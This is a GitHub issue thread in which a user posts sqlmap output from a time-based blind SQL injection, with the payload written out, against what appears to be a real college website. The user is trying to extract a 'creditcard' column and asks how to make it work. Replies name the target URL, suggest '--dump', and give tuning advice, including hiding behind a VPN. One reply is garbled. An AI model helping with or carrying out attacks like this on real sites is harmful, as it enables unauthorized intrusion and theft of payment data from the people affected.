### ISSUE TITLE
please help me, fix problem is sqlmap injection

### ISSUE THREAD

**Issue by anonex95** [sqlmapproject/sqlmap#2548]
```
> [*] starting at 00:20:26
> 
> [00:20:26] [INFO] resuming back-end DBMS 'mysql' 
> [00:20:26] [INFO] testing connection to the target URL
> sqlmap resumed the following injection point(s) from stored session:
> ---
> Parameter: id (GET)
>     Type: AND/OR time-based blind
>     Title: MySQL >= 5.0.12 AND time-based blind
>     Payload: id=3' AND SLEEP(5) AND 'arEB'='arEB
> ---
> [00:20:28] [INFO] the back-end DBMS is MySQL
> web server operating system: Windows 8 or 2012
> web application technology: ASP.NET, Microsoft IIS 8.0
> back-end DBMS: MySQL >= 5.0.12
> [00:20:28] [INFO] fetching entries of column(s) 'creditcard' for table 'a' in database 'kit165webdb'
> [00:20:28] [INFO] fetching number of column(s) 'creditcard' entries for table 'a' in database 'kit165webdb'
> [00:20:28] [WARNING] (case) time-based comparison requires larger statistical model, please wait.............................. (done)
> [00:21:08] [WARNING] it is very important to not stress the network adapter during usage of time-based payloads to prevent potential disruptions 
> 
> [00:21:11] [WARNING] unable to retrieve the number of column(s) 'creditcard' entries for table 'a' in database 'kit165webdb'
> [00:21:11] [INFO] fetched data logged to text files under '/root/.sqlmap/output/example.ac.in'
> 
> [*] shutting down at 00:21:11

```
`[03:17:22] [WARNING] it is very important to not stress the network adapter during usage of time-based payloads to prevent potential disruptions`

Please help me, what problem i am getting? And please give her solution.
Thanks you.

**Comment by putuoka** [comment]
So you want to hack this site http://kit.ac.in/news_detail.php?id=80 eh ? that's illegal man also there's no table name 'a' or 'credit card' just use --dump

**Comment by Ekultek** [comment]
I don't advise hacking without prior consent but I'd suggest you ever hack anything. But your database and column is wrong.



- Thomas Perkins

**Comment by stamparm** [comment]
@anonex95 this is not a proper way to fill the issue request. You've seen tons of questions in the original Issue form. From data you are providing it is clear that you are using most probably a non-existent table name (`a`). Also, you are dealing with `time-based SQLi` which is prone to errors due to network disturbances. In those kind of cases, if you see problems, use as high value for `--time-sec` and also, try to avoid usage of `--tor` and/or `--proxy` (maybe you could run it with some commercial VPN)
